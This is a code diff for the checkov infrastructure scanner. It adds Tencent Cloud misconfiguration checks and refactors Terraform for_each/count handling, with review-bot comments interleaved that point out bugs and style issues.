diff --git a/checkov/terraform/checks/resource/tencentcloud/TKEPublicIpAssigned.py b/checkov/terraform/checks/resource/tencentcloud/TKEPublicIpAssigned.py new file mode 100644 index 00000000000..870f8931f47 --- /dev/null +++ b/checkov/terraform/checks/resource/tencentcloud/TKEPublicIpAssigned.py @@ -0,0 +1,31 @@ +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.terraform.checks.resource.base_resource_value_check import \ + BaseResourceCheck + + +class TKEPublicIpAssigned(BaseResourceCheck): + def __init__(self): + name = "Ensure Tencent Cloud TKE cluster is not assigned a public IP address" + id = "CKV_TC_7" + supported_resources = ['tencentcloud_kubernetes_cluster'] + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf) -> CheckResult: + if conf.get("master_config"): + for mc in conf["master_config"]: + if mc.get("public_ip_assigned") and mc["public_ip_assigned"][0]: + return CheckResult.FAILED + if mc.get("public_ip_assigned") is None and mc.get("internet_max_bandwidth_out") and mc["internet_max_bandwidth_out"][0] > 0: + return CheckResult.FAILED + + if conf.get("worker_config"): + for mc in conf["worker_config"]: + if mc.get("public_ip_assigned") and mc["public_ip_assigned"][0]: + return CheckResult.FAILED + if mc.get("public_ip_assigned") is None and mc.get("internet_max_bandwidth_out") and mc["internet_max_bandwidth_out"][0] > 0: + return CheckResult.FAILED + return CheckResult.PASSED + + +check = TKEPublicIpAssigned() diff --git a/checkov/terraform/checks/resource/tencentcloud/VPCFlowLogConfigEnable.py b/checkov/terraform/checks/resource/tencentcloud/VPCFlowLogConfigEnable.py new file mode 100644 index 00000000000..6c81952e435 --- /dev/null +++ b/checkov/terraform/checks/resource/tencentcloud/VPCFlowLogConfigEnable.py 
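Review bot: `mc["internet_max_bandwidth_out"][0] > 0` raises TypeError whenever the value is not a number (an unresolved variable reference), so the check crashes instead of yielding a result; compare only when it is numeric, `bandwidth = mc["internet_max_bandwidth_out"][0]` / `if mc.get("public_ip_assigned") is None and isinstance(bandwidth, int) and bandwidth > 0:`. The master and worker loops are identical and should share a `_block_assigns_public_ip(block)` helper, which also gives a natural place for the comment that a non-zero egress bandwidth implies a public IP when `public_ip_assigned` is left unset.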
@@ -0,0 +1,23 @@ +from typing import Any, List + +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_negative_value_check import \ + BaseResourceNegativeValueCheck + + +class VPCFlowLogConfigEnable(BaseResourceNegativeValueCheck): + def __init__(self): + name = "Ensure Tencent Cloud VPC flow logs are enabled" + id = "CKV_TC_14" + supported_resources = ['tencentcloud_vpc_flow_log_config'] + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return 'enable/[0]' + + def get_forbidden_values(self) -> List[Any]: + return [False] + + +check = VPCFlowLogConfigEnable() diff --git a/checkov/terraform/checks/resource/tencentcloud/VPCSecurityGroupRuleSet.py b/checkov/terraform/checks/resource/tencentcloud/VPCSecurityGroupRuleSet.py new file mode 100644 index 00000000000..39340dd7b26 --- /dev/null +++ b/checkov/terraform/checks/resource/tencentcloud/VPCSecurityGroupRuleSet.py 
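Review bot: VPCFlowLogConfigEnable is filed under NETWORKING while the other audit-trail checks in this commit (CLBInstanceLog, TKELogAgentEnable, CVMDisableMonitorService) use LOGGING; flow-log collection is a logging control, so `categories = [CheckCategories.LOGGING]` keeps the category filter meaningful for users. A docstring noting that `enable` is a required attribute, so the negative check's missing-attribute default does not matter here, would pre-empt the question the CDB port check raises.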
@@ -0,0 +1,30 @@ +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.terraform.checks.resource.base_resource_value_check import \ + BaseResourceCheck + + +class VPCSecurityGroupRuleSet(BaseResourceCheck): + def __init__(self): + name = "Ensure Tencent Cloud VPC security group rules do not accept all traffic" + id = "CKV_TC_8" + supported_resources = ['tencentcloud_security_group_rule_set'] + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf) -> CheckResult: + if conf.get("ingress"): + for i in conf["ingress"]: + if i.get("action") and i["action"][0] != "ACCEPT": + continue + if i.get("cidr_block") is None and i.get("ipv6_cidr_block") is None: + continue + if i.get("cidr_block") and i["cidr_block"][0] != "0.0.0.0/0": + continue + if i.get("ipv6_cidr_block") and (i["ipv6_cidr_block"][0] not in ["::/0", "0::0/0"]): + continue + return CheckResult.FAILED + + return CheckResult.PASSED + + +check = VPCSecurityGroupRuleSet() diff --git a/checkov/terraform/checks/resource/tencentcloud/__init__.py b/checkov/terraform/checks/resource/tencentcloud/__init__.py new file mode 100644 index 00000000000..459e8fd319b --- /dev/null +++ b/checkov/terraform/checks/resource/tencentcloud/__init__.py @@ -0,0 +1,5 @@ +import glob +from os.path import basename, dirname, isfile, join + +modules = glob.glob(join(dirname(__file__), "*.py")) +__all__ = [basename(f)[:-3] for f in modules if isfile(f) and not f.endswith("__init__.py")] diff --git a/checkov/terraform/graph_builder/foreach/builder.py b/checkov/terraform/graph_builder/foreach/builder.py index f19d0b009d5..ffaf7bca36d 100644 --- a/checkov/terraform/graph_builder/foreach/builder.py +++ b/checkov/terraform/graph_builder/foreach/builder.py 
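Review bot: The name promises "do not accept all traffic", but the rule ignores `protocol` and `port`, so a deliberate `0.0.0.0/0` ingress on 443 is reported identically to an any/any rule; either also require the port/protocol to be the provider's all-traffic sentinel or rename the check to "from any source" so suppressions stay honest. The `continue` on a restrictive `cidr_block` also runs before the IPv6 test, so a rule pairing a private `cidr_block` with `ipv6_cidr_block = "::/0"` is skipped; evaluate the two families independently. Egress rules are not examined at all, which is fine if intended but should be stated in a docstring.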
@@ -2,6 +2,7 @@ import typing +from checkov.terraform.graph_builder.foreach.data_handler import ForeachDataHandler from checkov.terraform.graph_builder.foreach.module_handler import ForeachModuleHandler from checkov.terraform.graph_builder.foreach.resource_handler import ForeachResourceHandler from checkov.terraform.graph_builder.graph_components.block_types import BlockType @@ -14,12 +15,21 @@ class ForeachBuilder: def __init__(self, local_graph: TerraformLocalGraph): self._resource_handler = ForeachResourceHandler(local_graph) self._module_handler = ForeachModuleHandler(local_graph) + self._data_handler = ForeachDataHandler(local_graph) def handle(self, foreach_blocks: dict[str, list[int]]) -> None: + """ + First Data blocks that Modules can inherit from are handled. + Second, Module blocks are handled. + Last Resource blocks that can be duplicate by the Modules rendering. + """ + if self._data_handler.local_graph.enable_datas_foreach_handling: + if foreach_blocks.get(BlockType.DATA): + self._data_handler.handle(foreach_blocks[BlockType.DATA]) + self._data_handler.local_graph._arrange_graph_data() + self._data_handler.local_graph._build_edges() if self._module_handler.local_graph.enable_modules_foreach_handling: if foreach_blocks.get(BlockType.MODULE): self._module_handler.handle(foreach_blocks[BlockType.MODULE]) - self._module_handler.local_graph._arrange_graph_data() - self._module_handler.local_graph._build_edges() if self._module_handler.local_graph.enable_foreach_handling: self._resource_handler.handle(foreach_blocks.get(BlockType.RESOURCE, [])) diff --git a/checkov/terraform/graph_builder/foreach/data_handler.py b/checkov/terraform/graph_builder/foreach/data_handler.py new file mode 100644 index 00000000000..f5a343471b2 --- /dev/null +++ b/checkov/terraform/graph_builder/foreach/data_handler.py 
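Review bot: The two graph rebuild calls `_arrange_graph_data()` / `_build_edges()` appear to sit under `enable_datas_foreach_handling` rather than under `if foreach_blocks.get(BlockType.DATA):` (indentation is not recoverable from the collapsed hunk, so please confirm), which would rebuild the whole graph on every run with the flag on even when no data block uses count or for_each — the removed module code only rebuilt when modules were actually handled. Gate both calls under the inner `if`, or move them into `ForeachDataHandler.handle` as this commit does for modules, so the rebuild happens exactly once per handled block type. The docstring also reads "can be duplicate by the Modules rendering"; "may be duplicated by the module rendering" is what is meant.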
@@ -0,0 +1,14 @@ +from __future__ import annotations + +from checkov.terraform.graph_builder.graph_components.block_types import BlockType +from checkov.terraform.graph_builder.foreach.foreach_entity_handler import ForeachEntityHandler + +from typing import TYPE_CHECKING + +if TYPE_CHECKING: + from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph + + +class ForeachDataHandler(ForeachEntityHandler): + def __init__(self, local_graph: TerraformLocalGraph) -> None: + super().__init__(local_graph, BlockType.DATA) diff --git a/checkov/terraform/graph_builder/foreach/foreach_entity_handler.py b/checkov/terraform/graph_builder/foreach/foreach_entity_handler.py new file mode 100644 index 00000000000..7fc4dc771df --- /dev/null +++ b/checkov/terraform/graph_builder/foreach/foreach_entity_handler.py 
@@ -0,0 +1,108 @@ +from __future__ import annotations + +import logging +from typing import Any, Optional, TYPE_CHECKING + +from checkov.common.util.data_structures_utils import pickle_deepcopy +from checkov.terraform.graph_builder.foreach.abstract_handler import ForeachAbstractHandler +from checkov.terraform.graph_builder.foreach.consts import FOR_EACH_BLOCK_TYPE, FOREACH_STRING, COUNT_STRING +from checkov.terraform.graph_builder.graph_components.blocks import TerraformBlock + +if TYPE_CHECKING: + from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph + + +class ForeachEntityHandler(ForeachAbstractHandler): + def __init__(self, local_graph: TerraformLocalGraph, block_type_to_handle: str) -> None: + super().__init__(local_graph) + self.block_type_to_handle = block_type_to_handle + + def handle(self, resources_blocks: list[int]) -> None: + block_index_to_statement: FOR_EACH_BLOCK_TYPE = self._get_statements(resources_blocks) + self._create_new_resources(block_index_to_statement) + + def _get_statements(self, resources_blocks: list[int]) -> FOR_EACH_BLOCK_TYPE: + if not resources_blocks: + return {} + block_index_to_statement: FOR_EACH_BLOCK_TYPE = {} + for block_index, block in enumerate(self.local_graph.vertices): + if block.block_type != self.block_type_to_handle or not (FOREACH_STRING in block.attributes or COUNT_STRING in block.attributes): + continue + foreach_statement = self._get_static_foreach_statement(block_index) + block_index_to_statement[block_index] = foreach_statement + blocks_to_render = [block_idx for block_idx, statement in block_index_to_statement.items() if statement is None] + if blocks_to_render: + rendered_statements: FOR_EACH_BLOCK_TYPE = self._handle_dynamic_statement(blocks_to_render) + block_index_to_statement.update(rendered_statements) + return block_index_to_statement + + def _get_static_foreach_statement(self, block_index: int) -> Optional[list[str] | dict[str, Any] | int]: + attributes = 
self.local_graph.vertices[block_index].attributes + if not attributes.get(FOREACH_STRING) and not attributes.get(COUNT_STRING): + return None + try: + if self._is_static_statement(block_index): + return self._handle_static_statement(block_index) + else: + return None + except Exception as e: + logging.info( + f"Cannot get foreach statement for block: {self.local_graph.vertices[block_index]}, error: {str(e)}") + return None + + def _handle_dynamic_statement(self, blocks_to_render: list[int]) -> FOR_EACH_BLOCK_TYPE: + rendered_statements_by_idx: FOR_EACH_BLOCK_TYPE = {} + sub_graph = self._build_sub_graph(blocks_to_render) + self._render_sub_graph(sub_graph, blocks_to_render) + for block_idx in blocks_to_render: + if not self._is_static_statement(block_idx, sub_graph): + rendered_statements_by_idx[block_idx] = None + else: + rendered_statements_by_idx[block_idx] = self._handle_static_statement(block_idx, sub_graph) + return rendered_statements_by_idx + + def _create_new_resources_count(self, statement: int, block_idx: int) -> None: + main_resource = self.local_graph.vertices[block_idx] + for i in range(statement): + self._create_new_resource(main_resource, i, resource_idx=block_idx, foreach_idx=i) + + def _create_new_foreach_resource(self, block_idx: int, foreach_idx: int, main_resource: TerraformBlock, + new_key: int | str, new_value: int | str) -> None: + self._create_new_resource(main_resource, new_value, new_key=new_key, resource_idx=block_idx, foreach_idx=foreach_idx) + + def _create_new_resource( + self, + main_resource: TerraformBlock, + new_value: int | str, + resource_idx: int, + foreach_idx: int, + new_key: int | str | None = None, + ) -> None: + new_resource = pickle_deepcopy(main_resource) + block_type, block_name = new_resource.name.split('.') + key_to_val_changes = self._build_key_to_val_changes(main_resource, new_value, new_key) + config_attrs = new_resource.config.get(block_type, {}).get(block_name, {}) + + self._update_foreach_attrs(config_attrs, 
key_to_val_changes, new_resource) + idx_to_change = new_key or new_value + self._add_index_to_resource_block_properties(new_resource, idx_to_change) + if foreach_idx == 0: + self.local_graph.vertices[resource_idx] = new_resource + else: + self.local_graph.vertices.append(new_resource) + + @staticmethod + def _add_index_to_resource_block_properties(block: TerraformBlock, idx: str | int) -> None: + block_type, block_name = block.name.split('.') + idx_with_separator = ForeachEntityHandler._update_block_name_and_id(block, idx) + if block.config.get(block_type) and block.config.get(block_type, {}).get(block_name): + block.config[block_type][f"{block_name}[{idx_with_separator}]"] = block.config[block_type].pop(block_name) + + def _create_new_resources(self, block_index_to_statement: FOR_EACH_BLOCK_TYPE) -> None: + for block_idx, statement in block_index_to_statement.items(): + if not statement: + continue + if isinstance(statement, int): + self._create_new_resources_count(statement, block_idx) + else: + self._create_new_resources_foreach(statement, block_idx) diff --git a/checkov/terraform/graph_builder/foreach/module_handler.py b/checkov/terraform/graph_builder/foreach/module_handler.py index 566ca77b897..b84d8bc3493 100644 --- a/checkov/terraform/graph_builder/foreach/module_handler.py +++ b/checkov/terraform/graph_builder/foreach/module_handler.py @@ -35,6 +35,8 @@ def handle(self, modules_blocks: list[int]) -> None: while modules_to_render: modules_to_render = self._render_foreach_modules_by_levels(modules_blocks, modules_to_render, current_level) + self.local_graph._arrange_graph_data() + self.local_graph._build_edges() def _render_foreach_modules_by_levels(self, modules_blocks: list[int], modules_to_render: list[int], current_level: list[TFModule | None]) -> list[int]: 
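Review bot: In `_create_new_resource`, `idx_to_change = new_key or new_value` silently substitutes the value whenever the key is falsy but valid — an empty-string key in a for_each map, or a `0` that a caller might pass as key — so the duplicated block gets the wrong index in its name and config; use `new_key if new_key is not None else new_value`. `_get_static_foreach_statement` catches `Exception` and logs at info with only `str(e)`, which hides the traceback for rendering failures; `logging.debug(..., exc_info=True)` or at least a warning would keep the failure diagnosable without being noisy. `_get_statements` only uses `resources_blocks` as an emptiness test and then scans every vertex of the handled block type; if that is intended, say so in its docstring, otherwise restrict the loop to the given indices.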
@@ -75,8 +77,16 @@ def _duplicate_module_with_for_each(self, module_idx: int, for_each: dict[str, A def _duplicate_module_with_count(self, module_idx: int, count: int) -> None: self._create_new_resources_count(count, module_idx) + def _get_rendered_modules(self, source_modules: list[TFModule | None]) -> list[int]: + """ + Returns a list of module indexes that have been rendered in the current iteration. + """ + modules_created_by_provided_source_packed = [self.local_graph.vertices_by_module_dependency[curr][BlockType.MODULE] for curr in source_modules] + modules_created_by_provided_source = list(itertools.chain(*modules_created_by_provided_source_packed)) # list of lists -> single list + return modules_created_by_provided_source + def _get_modules_to_render(self, current_level: list[TFModule | None]) -> list[int]: - rendered_modules = [self.local_graph.vertices_by_module_dependency[curr][BlockType.MODULE] for curr in current_level][0] + rendered_modules = self._get_rendered_modules(current_level) current_level.clear() for m_idx in rendered_modules: current_level.append(self._get_current_tf_module_object(m_idx)) @@ -190,7 +200,7 @@ def _create_new_module( main_resource_module_key = TFModule( path=new_resource.path, name=main_resource.name, - nested_tf_module=self._get_tf_module_with_no_foreach(new_resource.source_module_object) + nested_tf_module=new_resource.source_module_object ) # Without making this copy the test don't pass, as we might access the data structure in the middle of an update 
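Review bot: In `_get_rendered_modules`, `itertools.chain(*modules_created_by_provided_source_packed)` unpacks the whole list into positional arguments; `itertools.chain.from_iterable(...)` is the idiomatic form, and the two statements collapse to one comprehension: `return [m_idx for curr in source_modules for m_idx in self.local_graph.vertices_by_module_dependency[curr][BlockType.MODULE]]`. `vertices_by_module_dependency` is declared as a `defaultdict` in local_graph.py, so indexing it with a `curr` that has no entry silently inserts an empty one; if unseen keys can reach this method, `.get(curr, {}).get(BlockType.MODULE, [])` avoids that side effect. The `itertools` import is not part of this hunk, so I assume it is added elsewhere in the commit.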
@@ -247,9 +257,17 @@ def _create_new_module_with_vertices(self, main_resource: TerraformBlock, def _add_new_vertices_for_module(self, new_module_key: TFModule | None, new_module_value: dict[str, list[int]], new_resource_vertex_idx: int) -> dict[str, list[int]]: new_vertices_module_value: dict[str, list[int]] = defaultdict(list) + seen_vertices = [] for vertex_type, vertices_idx in new_module_value.items(): for vertex_idx in vertices_idx: module_vertex = self.local_graph.vertices[vertex_idx] + if module_vertex in seen_vertices: + # Makes sure we won't mistakenly go over vertices we already copied. + # This may happen when using nested modules with count>2, + # as we might duplicate the previous count index resources mistakenly. + # See issue https://github.com/bridgecrewio/checkov/issues/6068 + continue + seen_vertices.append(module_vertex) new_vertex = pickle_deepcopy(module_vertex) new_vertex.source_module_object = new_module_key self.local_graph.vertices.append(new_vertex) diff --git a/checkov/terraform/graph_builder/foreach/resource_handler.py b/checkov/terraform/graph_builder/foreach/resource_handler.py index 8540d8d12b1..e08101f5634 100644 --- a/checkov/terraform/graph_builder/foreach/resource_handler.py +++ b/checkov/terraform/graph_builder/foreach/resource_handler.py 
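Review bot: `seen_vertices` is a list, so `module_vertex in seen_vertices` is a linear scan that invokes `TerraformBlock` equality against every vertex already copied, which makes this loop quadratic in the module size — the wrong direction for the large-graph performance issue the comment cites. The loop already has `vertex_idx`, so track indexes instead: `seen_vertices: set[int] = set()`, `if vertex_idx in seen_vertices: continue`, `seen_vertices.add(vertex_idx)`. That is O(1) per check and keys on the vertex slot rather than on structural equality, so two distinct vertices that happen to compare equal (if `__eq__` is structural) are not dropped by mistake. `_add_new_vertices_for_module` continues past the end of the hunk.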
@@ -1,110 +1,15 @@ from __future__ import annotations -import logging -import typing -from typing import Any, Optional - -from checkov.common.util.data_structures_utils import pickle_deepcopy from checkov.terraform.graph_builder.graph_components.block_types import BlockType -from checkov.terraform.graph_builder.foreach.abstract_handler import ForeachAbstractHandler -from checkov.terraform.graph_builder.foreach.consts import FOREACH_STRING, COUNT_STRING, FOR_EACH_BLOCK_TYPE -from checkov.terraform.graph_builder.graph_components.blocks import TerraformBlock - -if typing.TYPE_CHECKING: - from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph - - -class ForeachResourceHandler(ForeachAbstractHandler): - def __init__(self, local_graph: TerraformLocalGraph) -> None: - super().__init__(local_graph) - - def handle(self, resources_blocks: list[int]) -> None: - block_index_to_statement: FOR_EACH_BLOCK_TYPE = self._get_statements(resources_blocks) - self._create_new_resources(block_index_to_statement) +from checkov.terraform.graph_builder.foreach.foreach_entity_handler import ForeachEntityHandler - def _get_statements(self, resources_blocks: list[int]) -> FOR_EACH_BLOCK_TYPE: - if not resources_blocks: - return {} - block_index_to_statement: FOR_EACH_BLOCK_TYPE = {} - for block_index, block in enumerate(self.local_graph.vertices): - if block.block_type != BlockType.RESOURCE or not (FOREACH_STRING in block.attributes or COUNT_STRING in block.attributes): - continue - foreach_statement = self._get_static_foreach_statement(block_index) - block_index_to_statement[block_index] = foreach_statement - blocks_to_render = [block_idx for block_idx, statement in block_index_to_statement.items() if statement is None] - if blocks_to_render: - rendered_statements: FOR_EACH_BLOCK_TYPE = self._handle_dynamic_statement(blocks_to_render) - block_index_to_statement.update(rendered_statements) - return block_index_to_statement +from typing import TYPE_CHECKING - def 
_get_static_foreach_statement(self, block_index: int) -> Optional[list[str] | dict[str, Any] | int]: - attributes = self.local_graph.vertices[block_index].attributes - if not attributes.get(FOREACH_STRING) and not attributes.get(COUNT_STRING): - return None - try: - if self._is_static_statement(block_index): - return self._handle_static_statement(block_index) - else: - return None - except Exception as e: - logging.info( - f"Cant get foreach statement for block: {self.local_graph.vertices[block_index]}, error: {str(e)}") - return None - - def _handle_dynamic_statement(self, blocks_to_render: list[int]) -> FOR_EACH_BLOCK_TYPE: - rendered_statements_by_idx: FOR_EACH_BLOCK_TYPE = {} - sub_graph = self._build_sub_graph(blocks_to_render) - self._render_sub_graph(sub_graph, blocks_to_render) - for block_idx in blocks_to_render: - if not self._is_static_statement(block_idx, sub_graph): - rendered_statements_by_idx[block_idx] = None - else: - rendered_statements_by_idx[block_idx] = self._handle_static_statement(block_idx, sub_graph) - return rendered_statements_by_idx - - def _create_new_resources_count(self, statement: int, block_idx: int) -> None: - main_resource = self.local_graph.vertices[block_idx] - for i in range(statement): - self._create_new_resource(main_resource, i, resource_idx=block_idx, foreach_idx=i) - - def _create_new_resource( - self, - main_resource: TerraformBlock, - new_value: int | str, - resource_idx: int, - foreach_idx: int, - new_key: int | str | None = None, - ) -> None: - new_resource = pickle_deepcopy(main_resource) - block_type, block_name = new_resource.name.split('.') - key_to_val_changes = self._build_key_to_val_changes(main_resource, new_value, new_key) - config_attrs = new_resource.config.get(block_type, {}).get(block_name, {}) - - self._update_foreach_attrs(config_attrs, key_to_val_changes, new_resource) - idx_to_change = new_key or new_value - self._add_index_to_resource_block_properties(new_resource, idx_to_change) - if foreach_idx == 
0: - self.local_graph.vertices[resource_idx] = new_resource - else: - self.local_graph.vertices.append(new_resource) +if TYPE_CHECKING: + from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph - def _create_new_foreach_resource(self, block_idx: int, foreach_idx: int, main_resource: TerraformBlock, - new_key: int | str, new_value: int | str) -> None: - self._create_new_resource(main_resource, new_value, new_key=new_key, resource_idx=block_idx, - foreach_idx=foreach_idx) - @staticmethod - def _add_index_to_resource_block_properties(block: TerraformBlock, idx: str | int) -> None: - block_type, block_name = block.name.split('.') - idx_with_separator = ForeachResourceHandler._update_block_name_and_id(block, idx) - if block.config.get(block_type) and block.config.get(block_type, {}).get(block_name): - block.config[block_type][f"{block_name}[{idx_with_separator}]"] = block.config[block_type].pop(block_name) +class ForeachResourceHandler(ForeachEntityHandler): - def _create_new_resources(self, block_index_to_statement: FOR_EACH_BLOCK_TYPE) -> None: - for block_idx, statement in block_index_to_statement.items(): - if not statement: - continue - if isinstance(statement, int): - self._create_new_resources_count(statement, block_idx) - else: - self._create_new_resources_foreach(statement, block_idx) + def __init__(self, local_graph: TerraformLocalGraph) -> None: + super().__init__(local_graph, BlockType.RESOURCE) diff --git a/checkov/terraform/graph_builder/foreach/utils.py b/checkov/terraform/graph_builder/foreach/utils.py new file mode 100644 index 00000000000..604b8d709ce --- /dev/null +++ b/checkov/terraform/graph_builder/foreach/utils.py 
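Review bot: Style point on the new import block in resource_handler.py: the stdlib `from typing import TYPE_CHECKING` now sits below the two `checkov` imports, whereas local_graph.py in this same diff keeps `typing` above its `checkov` imports; moving it up keeps the stdlib / local grouping consistent. What remains of `ForeachResourceHandler` is a one-line `__init__` forwarding `BlockType.RESOURCE`, so a one-line class docstring such as `"""Foreach/count handler specialised for resource blocks; all logic lives in ForeachEntityHandler."""` would tell readers why the class still exists.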
@@ -0,0 +1,32 @@ +from __future__ import annotations + +from typing import Optional + +FOREACH_KEY_SEPERATOR = '["' +FOREACH_KEY_ENDER = '"]' +COUNT_KEY_SEPERATOR = "[" +COUNT_KEY_ENDER = "]" + + +def get_terraform_foreach_or_count_key(resource_id: str) -> Optional[str]: + sanitized_id = get_sanitized_terraform_resource_id(resource_id) + if sanitized_id == resource_id: + return None + key = resource_id.split(sanitized_id)[-1] + while key.startswith(FOREACH_KEY_SEPERATOR) and key.endswith(FOREACH_KEY_ENDER): + key = key[2:-2] + while key.startswith(COUNT_KEY_SEPERATOR) and key.endswith(COUNT_KEY_ENDER): + key = key[1:-1] + return key + + +def get_sanitized_terraform_resource_id(resource_id: str) -> str: + if FOREACH_KEY_SEPERATOR in resource_id: + original_id_parts = resource_id.split(FOREACH_KEY_SEPERATOR, maxsplit=1) + original_resource_name = original_id_parts[-2] # As the last item will be the key itself, + return original_resource_name # This will be the resource id before the foreach key was added + elif COUNT_KEY_SEPERATOR in resource_id: + original_id_parts = resource_id.split(COUNT_KEY_SEPERATOR) + original_resource_name = original_id_parts[-2] + return original_resource_name + return resource_id diff --git a/checkov/terraform/graph_builder/graph_components/module.py b/checkov/terraform/graph_builder/graph_components/module.py index 8b67f9cb1e4..76231fb7ece 100644 --- a/checkov/terraform/graph_builder/graph_components/module.py +++ b/checkov/terraform/graph_builder/graph_components/module.py @@ -7,6 +7,7 @@ from checkov.common.typing import TFDefinitionKeyType from checkov.common.util.data_structures_utils import pickle_deepcopy +from checkov.terraform import TFDefinitionKey from checkov.terraform.graph_builder.graph_components.block_types import BlockType from checkov.terraform.graph_builder.graph_components.blocks import TerraformBlock from checkov.terraform.parser_functions import handle_dynamic_values 
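Review bot: In `get_terraform_foreach_or_count_key`, `key = resource_id.split(sanitized_id)[-1]` splits on the resource name as a substring, so a key whose text contains the name again yields the wrong remainder; because `sanitized_id` is by construction the leading part of `resource_id`, `key = resource_id[len(sanitized_id):]` is both simpler and exact. In `get_sanitized_terraform_resource_id` the count branch calls `split(COUNT_KEY_SEPERATOR)` without `maxsplit`, so `[-2]` is the resource name only when the id holds exactly one `[`; an id with two bracket groups would return the inner index text, which disagrees with the foreach branch's `maxsplit=1` — I cannot tell from this hunk whether such ids occur, but `maxsplit=1` in both branches makes the two paths behave the same. The new module-level constants spell "SEPERATOR"; since this is a brand-new public module, fixing the spelling before other files import the names is cheaper than later.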
@@ -34,6 +35,7 @@ def __init__( self.resources_types: Set[str] = set() self.source_dir = source_dir self.render_dynamic_blocks_env_var = os.getenv('CHECKOV_RENDER_DYNAMIC_MODULES', 'True') + self.temp_tf_definition: dict[TFDefinitionKey, dict[str, Any]] = {} def __eq__(self, other: object) -> bool: if not isinstance(other, Module): diff --git a/checkov/terraform/graph_builder/local_graph.py b/checkov/terraform/graph_builder/local_graph.py index a0491a44926..a9560feb947 100644 --- a/checkov/terraform/graph_builder/local_graph.py +++ b/checkov/terraform/graph_builder/local_graph.py @@ -1,11 +1,12 @@ from __future__ import annotations +import json import logging import os from collections import defaultdict from functools import partial from pathlib import Path -from typing import List, Optional, Union, Any, Dict, overload, TypedDict +from typing import List, Optional, Union, Any, Dict, overload, TypedDict, cast import checkov.terraform.graph_builder.foreach.consts from checkov.common.graph.graph_builder import Edge 
@@ -14,11 +15,12 @@ from checkov.common.graph.graph_builder.local_graph import LocalGraph from checkov.common.graph.graph_builder.utils import calculate_hash, join_trimmed_strings, filter_sub_keys from checkov.common.runners.base_runner import strtobool +from checkov.common.typing import TFDefinitionKeyType from checkov.common.util.data_structures_utils import pickle_deepcopy from checkov.common.util.type_forcers import force_int from checkov.terraform.graph_builder.foreach.builder import ForeachBuilder from checkov.terraform.graph_builder.variable_rendering.vertex_reference import TerraformVertexReference -from checkov.terraform.modules.module_objects import TFModule +from checkov.terraform.modules.module_objects import TFModule, TFDefinitionKey from checkov.terraform.context_parsers.registry import parser_registry from checkov.terraform.graph_builder.graph_components.block_types import BlockType from checkov.terraform.graph_builder.graph_components.blocks import TerraformBlock 
@@ -29,14 +31,18 @@ get_referenced_vertices_in_value, attribute_has_nested_attributes, remove_index_pattern_from_str, - join_double_quote_surrounded_dot_split, -) + join_double_quote_surrounded_dot_split, ) +from checkov.terraform.graph_builder.foreach.utils import get_terraform_foreach_or_count_key, \ + get_sanitized_terraform_resource_id from checkov.terraform.graph_builder.utils import is_local_path -from checkov.terraform.graph_builder.variable_rendering.renderer import TerraformVariableRenderer - +from checkov.terraform.graph_builder.variable_rendering.renderer import TerraformVariableRenderer, \ + LEFT_BRACKET_WITH_QUOTATION, RIGHT_BRACKET_WITH_QUOTATION, LEFT_BRACKET, RIGHT_BRACKET, DOLLAR_PREFIX, RIGHT_CURLY, LEFT_CURLY +from checkov.common.util.consts import RESOLVED_MODULE_ENTRY_NAME MODULE_RESERVED_ATTRIBUTES = ("source", "version") CROSS_VARIABLE_EDGE_PREFIX = '[cross-variable] ' +S3_BUCKET_RESOURCE_NAME = "aws_s3_bucket" +S3_BUCKET_REFERENCE_ATTRIBUTE = "bucket" class Undetermined(TypedDict): @@ -45,6 +51,11 @@ class Undetermined(TypedDict): variable_vertex_id: int +class S3ConnectedResources(TypedDict): + bucket_resource_index: int | None + referenced_vertices: List[Edge] + + class TerraformLocalGraph(LocalGraph[TerraformBlock]): def __init__(self, module: Module) -> None: super().__init__() 
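Review bot: `join_double_quote_surrounded_dot_split, )` folds the closing parenthesis of the multi-line `from ... import (` onto the last name, which black/ruff would undo and which reads as an accidental by-product of deleting the `)` line; keep `)` on its own line. The two new imports directly below use backslash continuations while the surrounding block uses parentheses — the parenthesised form is the one the file already uses. The new `S3ConnectedResources` TypedDict mixes `int | None` with `List[Edge]`; `list[Edge]` matches the PEP 604 style used in the same declaration.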
@@ -58,7 +69,11 @@ def __init__(self, module: Module) -> None: self.vertices_by_module_dependency: Dict[TFModule | None, Dict[str, List[int]]] = defaultdict(partial(defaultdict, list)) self.enable_foreach_handling = strtobool(os.getenv('CHECKOV_ENABLE_FOREACH_HANDLING', 'True')) self.enable_modules_foreach_handling = strtobool(os.getenv('CHECKOV_ENABLE_MODULES_FOREACH_HANDLING', 'True')) - self.foreach_blocks: Dict[str, List[int]] = {BlockType.RESOURCE: [], BlockType.MODULE: []} + self.enable_datas_foreach_handling = strtobool(os.getenv('CHECKOV_ENABLE_DATAS_FOREACH_HANDLING', 'False')) + self.foreach_blocks: Dict[str, List[int]] = {BlockType.RESOURCE: [], BlockType.MODULE: [], BlockType.DATA: []} + + # Important for foreach performance, see issue https://github.com/bridgecrewio/checkov/issues/6068 + self._vertex_path_to_realpath_cache: Dict[str, str] = {} def build_graph(self, render_variables: bool) -> None: self._create_vertices() @@ -66,7 +81,7 @@ def build_graph(self, render_variables: bool) -> None: self._build_edges() logging.info(f"[TerraformLocalGraph] created {len(self.edges)} edges") if (self.enable_foreach_handling or self.enable_modules_foreach_handling) \ - and (self.foreach_blocks[BlockType.RESOURCE] or self.foreach_blocks[BlockType.MODULE]): + and (self.foreach_blocks[BlockType.RESOURCE] or self.foreach_blocks[BlockType.MODULE] or self.foreach_blocks[BlockType.DATA]): try: logging.info('[TerraformLocalGraph] start handling foreach') foreach_builder = ForeachBuilder(self) @@ -78,6 +93,7 @@ def build_graph(self, render_variables: bool) -> None: logging.info(f'Failed to process foreach handling, error: {str(e)}') self.calculate_encryption_attribute(ENCRYPTION_BY_RESOURCE_TYPE) + self._connect_module_provider() if render_variables: logging.info(f"Rendering variables, graph has 